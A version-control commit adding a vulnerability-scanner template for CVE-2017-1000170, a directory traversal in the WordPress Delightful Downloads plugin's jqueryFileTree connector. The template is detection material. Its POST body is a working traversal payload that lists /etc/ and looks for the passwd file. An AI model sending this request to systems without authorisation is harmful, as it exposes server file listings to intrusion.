🔥 Add CVE-2017-1000170

patch-1
Dwi Siswanto 2021-03-23 19:56:42 +07:00
parent 3252d3c5d3
commit 53c0e1e954
1 changed files with 25 additions and 0 deletions

View File

@ -0,0 +1,25 @@
id: CVE-2017-1000170
info:
name: WordPress Plugin Delightful Downloads Jquery File Tree 2.1.5 Path Traversal
author: dwisiswant0
severity: high
reference: https://www.exploit-db.com/exploits/49693
description: jqueryFileTree 2.1.5 and older Directory Traversal
tags: cve,cve2017,wp-plugin,traversal
requests:
- method: POST
path:
- "{{BaseURL}}/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php"
body: "dir=%2Fetc%2F&onlyFiles=true"
matchers-condition: and
matchers:
- type: word
words:
- "<li class='file ext_passwd'>"
condition: and
part: body
- type: status
status:
- 200